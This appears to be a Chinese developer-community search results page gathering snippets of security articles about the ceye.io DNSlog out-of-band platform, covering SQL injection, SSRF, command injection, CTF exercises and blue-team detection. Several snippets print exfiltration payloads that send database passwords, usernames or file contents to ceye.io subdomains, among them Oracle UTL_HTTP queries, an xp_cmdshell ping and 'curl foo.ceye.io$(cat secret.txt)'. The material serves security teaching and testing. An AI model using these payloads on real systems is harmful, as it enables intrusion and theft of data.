展开

关键词

开发小哥手把手教你用CEYE,请给他打电话!

3、如何使用登录 CEYE.IO,在用户详情页(http:ceye.ioprofile)可以看到自己的域名标识符 identifier,对于每个用户,都有唯一的域名标识符如 abcdef.ceye.io CEYE.IO平台提供了一台DNS Server来解析域名。 它的 nameserver address 被设置为自己的服务器IP,因此所有关于ceye.io 的域名的DNS查询最终都会被发送到CEYE的DNS服务器。 更多的Playload信息可以登录 CEYE.IO 平台获取。 通过HTTP带外信道检测 Blind Payload 的执行情况 CEYE.IO平台拥有自己的HTTP服务器,记录用户域名的所有请求。 在后台,CEYE.IO平台将记录客户端请求的URL,远程IP地址,Http Method,Data,User Agent,Content Type等信息。

3.7K80

数据库DNSLog外带注入-总结

请求的DNSlog平台: http:www.dnslog.cnhttp:ceye.io也可以自己手动搭建,工具地址:https:github.combugscanteamdnslog 本地环境复现: 在ceye.io test_user where id =1 union SELECT UTL_HTTP.REQUEST((select pass from test_user where id=1)||.mdk941.ceye.io test_user where id =1 union SELECT DBMS_LDAP.INIT((select pass from test_user where id=1)||.mdk941.ceye.io from test_user where id =1 union SELECT HTTPURITYPE((select pass from test_user where id=1)||.mdk941.ceye.io from test_user where id =1 union SELECT HTTPURITYPE((select pass from test_user where id=1)||.mdk941.ceye.io

87320
  • 广告
    关闭

    11.11智惠云集

    2核4G云服务器首年70元,还有多款热门云产品满足您的上云需求

  • 您找到你想要的搜索结果了吗?
    是的
    没有找到

    Dns注入

    然后注册一个ceye.io的账号,作为dns注入的平台??用到的东西呢就是下图中画圈的? 这是一个域名:分析一下:Ceye.io 就不用说了,前面的 xxxx.ceye.io是你的个人域名Dns注入最后的效果呢就是在xxxx.ceye.io前面显示你注入的结果。

    31420

    Total.js CMS 命令注入漏洞复现

    此处使用ceye.io??0x04修复建议打补丁。 投稿邮箱:cvebug@163.com

    33030

    SSRF漏洞挖掘的思路与技巧

    言归正传,如果这是一个漏洞点,那我们怎么用呢,最简单的方法,CEYE.IO。CEYE是一个用来检测带外流量的监控平台,如DNS查询和HTTP请求。 用法也很简单,登录 CEYE.IO,在用户详情页可以看到自己的域名标识符identifier,对于每个用户,都有唯一的域名标识符abcdef.ceye.io 。 那么这种地方,也是可能存在SSRF的,不过当我们输入ceye.io却发现并没有回显请求,这是因为这种地方一般会对后缀做一个检测,如果不是jpg或者其他图片后缀的话并不会通过,不过好在ceye.io是很强大的

    17621

    从 SQL Server 注入到 远程连接桌面

    xp_cmdshell,1;RECONFIGURE;-- 查看 whoami Payload:admin;exec master..xp_cmdshell ping %USERNAME%.vxxxx9.ceye.io

    27610

    IP匿名性研究

    ceye.io:?通过伪造httpheader中的 x-real-ip我们可以给自己加上一层伪装,但是并不能逃过检测:? ceye.io:? ceye.io和astrill检测是正常的,没有泄露信息,但是从whoer.net的结果看来:泄露了时区,语言等信息。最关键的是WEBRTC直接泄露出了我们的真实IP地址和内网地址。

    94920

    CTF入门web篇18命令执行无回显的判断方法及dnslog相关例题

    (要通过dns请求即可通过ping命令,也能通过curl命令,只要对域名进行访问,让域名服务器进行域名解析就可实现)例:大家可以去ceye.io注册个账号,注册完后会给一个域名,如果有域名解析请求会有记录

    1.2K00

    工具分享 | shiro漏洞检测RCE工具

    TeamsSix 我的个人博客:teamssix.com我的个人公众号:TeamsSix -c :输入要执行的命令-h :查看帮助-k : 输入自定义的key,不输入此参数时将遍历尝试默认key-t :输入你的ceye.io

    1.2K20

    D-Link系列路由器漏洞挖掘入门

    以此构造payloadurl = localhostdiagnostic.phpdata = act=ping&dst=%26 ping `whoami`.ceye.io%26因为是盲注的命令执行,所以这里需要借助一个盲打平台

    69880

    D-Link系列路由器漏洞挖掘入门

    以此构造payload url = localhostdiagnostic.php data = act=ping&dst=%26 ping `whoami`.ceye.io%26因为是盲注的命令执行,

    71190

    工具|Shiro漏洞一键检测利用工具ShiroExploit

    选择使用 ceye.io 进行漏洞检测可以不进行任何配置,配置文件中已经预置了 CEYE 域名和对应的 Token,当然也可以对其进行修改。

    3K20

    SQL注入的几种类型和原理

    select load_file(concat(,(select database()),.7dxfaj.ceye.ioabc))其中“7dxfaj.ceye.io”是“ceye.io”分配的子域名。” ceye.io”知道创宇404团队开发的一款记录DNSlog的平台,不仅能记录DNS请求,HTTP请求也同样。(就是日常崩)。为什么这里有四个“”,因为转义的原因,? 在ceye.io上查看解析记录,成功看到其中含有函数执行的结果。?什么样的场景下这个很有用?相对于时间盲住来说这个能够直接查询到结果,比时间盲住更好。但同时它的要求也很高,为什么? 后续的查询数据不再演示,需要注意的是,实战中,这种查询方式仍然显得缓慢,ceye.io也提供的对应的API,最好是字节自动化脚本。

    2.5K51

    基于时延的盲道研究:受限环境下的内容回传信道

    比如,某个命令注入漏洞,页面无回显,只得盲注,在确认环节,你注入 ;sleep 4 执行后,若应答延时 4s,心中必起涟漪;在漏洞利用环节,想取回 secret.txt,你会在 ceye.io 上申请个临时二级域名 foo.ceye.io,向目标注入 curl foo.ceye.io$(cat secret.txt) 命令,登录 ceye.io 查看 HTTP 访问日志,foo.ceye.io 的路径中便能看到完整

    29550

    蓝队的自我修养之事中监控 | HVV经验分享

    (1) 常见的 DNSLog 平台域名备注ceye.io知道创宇admin.dnslog.link四叶草安全www.dnslog.cn——dnslog.iohackit-mehyuga.coBuzz2d0dnslog.cn

    30730

    反制 Webdriver - 从 Bot 到 RCE 进发

    返回我们这里通过模拟一次DNS重绑定来探测,这里用一段简单的代码来做checkvar i = 0;var sessionid; function waitdata(){ fetch(http:r.d73ha3.ceye.io

    21230

    登陆页面渗透测试常见的几种思路与总结

    2AvVhdsgUs0FSA3SDFAdag==)print encrypt(key, open(payload.dat,rb).read())使用方法1:java -jar ysoserial.jar URLDNS 你的ceye.io

    1.8K10

    一次误报引发的DNS检测方案的思考:DNS隧道检测平民解决方案

    则必然需要高频率c) 类型为TXT,有回包d) 无A记录解析结果,也就无程序对结果发起访问e) 此实验场景未覆盖外传数据,所以不涉及注册问题结论:远控木马(实验功能较单一,扩展为大马则可精确覆盖检测特征)利用ceye.io

    1.1K70

    相关产品

    • 云服务器

      云服务器

      腾讯云服务器(CVM)为您提供安全可靠的弹性云计算服务。只需几分钟,您就可以在云端获取和启用云服务器,并实时扩展或缩减云计算资源。云服务器 支持按实际使用的资源计费,可以为您节约计算成本。

    相关资讯

    热门标签

    活动推荐

      运营活动

      活动名称
      广告关闭

      扫码关注云+社区

      领取腾讯云代金券